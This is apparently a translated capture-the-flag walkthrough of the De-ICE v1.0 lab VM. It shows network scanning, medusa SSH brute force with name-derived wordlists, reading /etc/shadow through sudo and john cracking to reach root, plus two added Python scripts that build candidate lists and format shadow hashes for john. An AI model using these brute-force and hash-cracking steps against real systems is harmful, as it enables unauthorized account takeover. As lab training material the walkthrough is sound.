This time I bring you DE-ICE v1.0.
The security distributions can be downloaded from Heorot.net.
What will we need?
-Two virtual machines
-De-ICE v1
-Backtrack 5
-A dictionary of common English passwords
What will our objectives be?
-Network mapping
-Network analysis
-Brute force against a service
-Brute force against the shadow file
-Root
Rules?
-No exploits
Here we go
We scan the network to locate our prey.
We find the host with netdiscover and identify its services with NMAP:

netdiscover
Currently scanning: 192.168.1.0/16 | Screen View: ARP Reply

1 Captured ARP Reply packets, from 1 hosts. Total size: 60
_____________________________________________________________________________
IP               At MAC Address      Count  Len  MAC Vendor
-----------------------------------------------------------------------------
192.168.1.100    08:00:27:b1:50:12   01     060  CADMUS COMPUTER SYSTEMS
root@bt:/# nmap -sV 192.168.1.100
Starting Nmap 5.59BETA1 ( http://nmap.org ) at 2012-02-02 22:07 CET
Nmap scan report for 192.168.1.100
Host is up (0.0070s latency).
Not shown: 992 filtered ports
PORT STATE SERVICE VERSION
20/tcp closed ftp-data
21/tcp open ftp vsftpd (broken: could not bind listening IPv4 socket)
22/tcp open ssh OpenSSH 4.3 (protocol 1.99)
25/tcp open smtp Sendmail 8.13.7/8.13.7
80/tcp open http Apache httpd 2.0.55 ((Unix) PHP/5.1.2)
110/tcp open pop3 Openwall popa3d
143/tcp open imap UW imapd 2004.357
443/tcp closed https
MAC Address: 08:00:27:B1:50:12 (Cadmus Computer Systems)
Service Info: Host: slax.example.net; OS: Unix
Service detection performed. Please report any incorrect results at http://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 25.29 seconds
Leaving a footprint
We see that several services are up, with one exception: FTP. vsftpd could not bind its IPv4 listening socket, so it accepts no connections.
We go in via HTTP and notice that the page shows us a few e-mail addresses. Let's mutate them.
This is what I got (the whole list, run together):
addamsaadamsadaamsdamsaaadamsabanterbbbanterbanterbanterbbbbanteerbbcoffeeccooffecccoffeecoooffecooofefcoofefccooffee
We launch medusa, hoping to get lucky.
medusa -h 192.168.1.100 -U user -P user -M ssh
Bingo! It finds us a user. Same username and password.
ACCOUNT CHECK: [ssh] Host: 192.168.1.100 (1 of 1, 0 complete) User: bbanter (7 of 16, 6 complete) Password: adaams (3 of 17 complete)
ACCOUNT CHECK: [ssh] Host: 192.168.1.100 (1 of 1, 0 complete) User: bbanter (7 of 16, 6 complete) Password: damsaa (4 of 17 complete)
ACCOUNT CHECK: [ssh] Host: 192.168.1.100 (1 of 1, 0 complete) User: bbanter (7 of 16, 6 complete) Password: adamsa (5 of 17 complete)
ACCOUNT CHECK: [ssh] Host: 192.168.1.100 (1 of 1, 0 complete) User: bbanter (7 of 16, 6 complete) Password: banterb (6 of 17 complete)
ACCOUNT CHECK: [ssh] Host: 192.168.1.100 (1 of 1, 0 complete) User: bbanter (7 of 16, 6 complete) Password: bbanter (7 of 17 complete)
ACCOUNT FOUND: [ssh] Host: 192.168.1.100 User: bbanter Password: bbanter [SUCCESS]
ACCOUNT CHECK: [ssh] Host: 192.168.1.100 (1 of 1, 0 complete) User: anterbb (8 of 16, 7 complete) Password: addams (1 of 17 complete)
ACCOUNT CHECK: [ssh] Host: 192.168.1.100 (1 of 1, 0 complete) User: anterbb (8 of 16, 7 complete) Password: aadams (2 of 17 complete)
ACCOUNT CHECK: [ssh] Host: 192.168.1.100 (1 of 1, 0 complete) User: anterbb (8 of 16, 7 complete) Password: adaams (3 of 17 complete)
ACCOUNT CHECK: [ssh] Host: 192.168.1.100 (1 of 1, 0 complete) User: anterbb (8 of 16, 7 complete) Password: damsaa (4 of 17 complete)
ACCOUNT CHECK: [ssh] Host: 192.168.1.100 (1 of 1, 0 complete) User: anterbb (8 of 16, 7 complete) Password: adamsa (5 of 17 complete)
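One way to produce that mutated list programmatically, as an added example that is not code from the original post. The first names are constructed placeholders (the post never shows the e-mail addresses); only the surnames match accounts on the target. The script writes the candidates to ./user, the file the medusa command above reads for both -U and -P, so every candidate is tried as a username and as a password.

```python
# Added example, not code from the original post: derive login/password
# candidates from people's names the way the post mutates the e-mail
# addresses found on the web page into "aadams", "bbanter", "adamsa", ...
# The first names below are constructed placeholders; only the surnames
# correspond to accounts that show up on the target.

def mutate_name(first, last, rotations=2):
    """Return username/password candidates for one person.

    Covers the usual corporate conventions (flast, lastf, first.last,
    firstlast, bare surname) plus rotated forms of the initial+surname
    token, which is how a list ends up with 'adamsa' and 'damsaa'
    next to 'aadams'.
    """
    f, l = first.lower(), last.lower()
    fi = f[0]
    cands = {
        fi + l,            # aadams     (initial + surname)
        l + fi,            # adamsa     (surname + initial)
        f + l,             # adamadams
        l + f,             # adamsadam
        f + "." + l,       # adam.adams
        fi + "." + l,      # a.adams
        l,                 # adams
        f,                 # adam
    }
    seed = fi + l
    for i in range(1, rotations + 1):   # "aadams" -> adamsa, damsaa
        cands.add(seed[i:] + seed[:i])
    return sorted(cands)


def build_wordlist(people):
    """Deduplicated candidate list for all (first, last) pairs, in order."""
    out, seen = [], set()
    for first, last in people:
        for cand in mutate_name(first, last):
            if cand not in seen:
                seen.add(cand)
                out.append(cand)
    return out


# Constructed sample input: the first names are assumptions.
PEOPLE = [("Adam", "Adams"), ("Bob", "Banter"), ("Chuck", "Coffee")]

if __name__ == "__main__":
    words = build_wordlist(PEOPLE)
    with open("user", "w") as fh:       # the same file serves -U and -P
        fh.write("\n".join(words) + "\n")
    print(f"{len(words)} candidates written to ./user")
    print("medusa -h 192.168.1.100 -U user -P user -M ssh")
```

Keep the list short on purpose: medusa against OpenSSH is slow per attempt, and a list of a few dozen name-derived tokens finds a "username = password" account, as happened here, in minutes, while a general dictionary is better saved for the second pass.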
Disappointment
I log in via SSH:
root@bt:/pentest/passwords/john# ssh bbanter@192.168.1.100
bbanter@192.168.1.100's password:
But if we try a cat /etc/shadow, permission is denied, as you would expect, so our next command is:
exit
If we read /etc/passwd first, we will see that the user aadams stands out from the rest with different permissions.
Calling Medusa for help
Let's try another dictionary:
It shows us the user aadams, with its corresponding password.
root@bt:/pentest/passwords/john# medusa -h 192.168.1.100 -U user -P list.lst -M ssh
ACCOUNT CHECK: [ssh] Host: 192.168.1.100 (1 of 1, 0 complete) User: aadams (7 of 16, 6 complete) Password: fuckyou (578 of 675 complete)
ACCOUNT CHECK: [ssh] Host: 192.168.1.100 (1 of 1, 0 complete) User: aadams (7 of 16, 6 complete) Password: matthew (579 of 675 complete)
ACCOUNT CHECK: [ssh] Host: 192.168.1.100 (1 of 1, 0 complete) User: aadams (7 of 16, 6 complete) Password: miller (560 of 675 complete)
ACCOUNT CHECK: [ssh] Host: 192.168.1.100 (1 of 1, 0 complete) User: aadams (7 of 16, 6 complete) Password: ou82 (561 of 675 complete)
ACCOUNT FOUND: [ssh] Host: 192.168.1.100 User: aadams Password: nostradamus [SUCCESS]
ACCOUNT CHECK: [ssh] Host: 192.168.1.100 (1 of 1, 0 complete) User: aadams (7 of 16, 6 complete) Password: tiger (562 of 675 complete)
ACCOUNT CHECK: [ssh] Host: 192.168.1.100 (1 of 1, 0 complete) User: aadams (7 of 16, 6 complete) Password: trustno1 (563 of 675 complete)
ACCOUNT CHECK: [ssh] Host: 192.168.1.100 (1 of 1, 0 complete) User: aadams (7 of 16, 6 complete) Password: 12345678 (564 of 675 complete)
ACCOUNT CHECK: [ssh] Host: 192.168.1.100 (1 of 1, 0 complete) User: aadams (7 of 16, 6 complete) Password: alex (565 of 675 complete)
ACCOUNT CHECK: [ssh] Host: 192.168.1.100 (1 of 1, 0 complete) User: aadams (7 of 16, 6 complete) Password: windows (566 of 675 complete)
ACCOUNT CHECK: [ssh] Host: 192.168.1.100 (1 of 1, 0 complete) User: aadams (7 of 16, 6 complete) Password: flipper (567 of 675 complete)
We go in via SSH and obtain the file.
Root Success
We exit.
root@bt:/pentest/passwords/john# ssh aadams@192.168.1.100
aadams@192.168.1.100's password:
Linux 2.6.16.
aadams@slax:~$ sudo cat /etc/shadow
Password:
root:$1$TOi0HE5n$j3obHaAlUdMbHQnJ4Y5Dq0:13553:0:::::
bin:*:9797:0:::::
daemon:*:9797:0:::::
adm:*:9797:0:::::
lp:*:9797:0:::::
sync:*:9797:0:::::
shutdown:*:9797:0:::::
halt:*:9797:0:::::
mail:*:9797:0:::::
news:*:9797:0:::::
uucp:*:9797:0:::::
operator:*:9797:0:::::
games:*:9797:0:::::
ftp:*:9797:0:::::
smmsp:*:9797:0:::::
mysql:*:9797:0:::::
rpc:*:9797:0:::::
sshd:*:9797:0:::::
gdm:*:9797:0:::::
pop:*:9797:0:::::
nobody:*:9797:0:::::
aadams:$1$6cP/ya8m$2CNF8mE.ONyQipxlwjp8P1:13550:0:99999:7:::
bbanter:$1$hl312g8m$Cf9v9OoRN062STzYiWDTh1:13550:0:99999:7:::
ccoffee:$1$nsHnABm3$OHraCR9ro.idCMtEiFPPA.:13550:0:99999:7:::
aadams@slax:~$ exit
We crack it:
root@bt:/pentest/passwords/john# ./john --rules --wordlist=list.lst shadow
The result I leave to your imagination, so as not to spoil the challenge by giving away the password.
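An added example, not code from the post: a parser for the shadow dump above that separates the locked system accounts (hash field *) from the four accounts carrying real MD5-crypt ($1$) hashes, reads the ageing fields, and writes the name:hash lines that john takes as input. SAMPLE_SHADOW is constructed from the lines the post shows (abridged); the function names are my own, and the handling of an empty hash field (a password-less account) goes beyond what this target shows.

```python
# Added example, not code from the original post: parse the /etc/shadow dump
# that "sudo cat /etc/shadow" returned, tell locked and password-less
# accounts apart from real hashes, identify the hash scheme, and emit the
# name:hash lines john takes.  SAMPLE_SHADOW is constructed from the lines
# the post shows; the helper names are my own.

from datetime import date, timedelta

# crypt(3) modular-format prefixes.  $1$ (MD5-crypt) is what this target
# uses; john handles it at high rates, so a --rules wordlist run is cheap.
SCHEMES = {
    "$1$": "md5crypt",
    "$2a$": "bcrypt", "$2b$": "bcrypt", "$2y$": "bcrypt",
    "$5$": "sha256crypt",
    "$6$": "sha512crypt",
    "$y$": "yescrypt",
}

EPOCH = date(1970, 1, 1)


def scheme_of(hash_field):
    """Name the crypt(3) scheme from its prefix ('unknown' for DES or others)."""
    for prefix, name in SCHEMES.items():
        if hash_field.startswith(prefix):
            return name
    return "unknown"


def parse_shadow(text):
    """Parse shadow-format text into a list of dicts, one per account.

    status is one of:
      'locked' - hash field is '*', or starts with '!' (no password login)
      'nopass' - hash field is empty (login without a password)
      'hash'   - a real hash worth cracking
    """
    entries = []
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith("#"):
            continue
        parts = line.split(":")
        if len(parts) < 2:
            continue
        parts += [""] * (9 - len(parts))          # pad short lines to 9 fields
        name, hsh, lastchg, _min, _max = parts[:5]
        if hsh == "":
            status = "nopass"
        elif hsh.startswith(("*", "!")):
            status = "locked"
        else:
            status = "hash"
        entries.append({
            "name": name,
            "hash": hsh,
            "status": status,
            "scheme": scheme_of(hsh) if status == "hash" else None,
            # field 3: days since the epoch of the last password change
            "last_change": EPOCH + timedelta(days=int(lastchg)) if lastchg.isdigit() else None,
            # field 5: max days before a change is forced; empty or 99999 = never
            "never_expires": _max in ("", "99999"),
        })
    return entries


def crackable(entries):
    """Accounts that carry a real hash: the ones to hand to john."""
    return [e for e in entries if e["status"] == "hash"]


def john_lines(entries):
    """name:hash lines in the layout john's loader expects."""
    return [f"{e['name']}:{e['hash']}" for e in crackable(entries)]


# Constructed sample: the lines the post's sudo'd cat printed, abridged.
SAMPLE_SHADOW = """\
root:$1$TOi0HE5n$j3obHaAlUdMbHQnJ4Y5Dq0:13553:0:::::
bin:*:9797:0:::::
daemon:*:9797:0:::::
sshd:*:9797:0:::::
nobody:*:9797:0:::::
aadams:$1$6cP/ya8m$2CNF8mE.ONyQipxlwjp8P1:13550:0:99999:7:::
bbanter:$1$hl312g8m$Cf9v9OoRN062STzYiWDTh1:13550:0:99999:7:::
ccoffee:$1$nsHnABm3$OHraCR9ro.idCMtEiFPPA.:13550:0:99999:7:::
"""

if __name__ == "__main__":
    ents = parse_shadow(SAMPLE_SHADOW)
    for e in crackable(ents):
        print(f"{e['name']:8} {e['scheme']:12} last change {e['last_change']}"
              f"{'  (never expires)' if e['never_expires'] else ''}")
    with open("shadow", "w") as fh:   # input for: ./john --rules --wordlist=list.lst shadow
        fh.write("\n".join(john_lines(ents)) + "\n")
```

Two things the parse makes visible that the raw dump hides: every human account (and root) uses MD5-crypt with no ageing enforced, and bbanter's hash can be checked against the password medusa already found, which tells you your wordlist and rules are working before you wait on root.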
Final result:
root@bt:/pentest/passwords/john# ssh aadams@192.168.1.100
aadams@192.168.1.100's password:
Linux 2.6.16.
aadams@slax:~$ su
Password: *****
root@slax:/home/aadams# whoami
root
root@slax:/home/aadams#
Until next time.
Dedicated to: OverSec.org, RemoteExecution.info, http://malware-reversing.com.ar, CPH
Cheers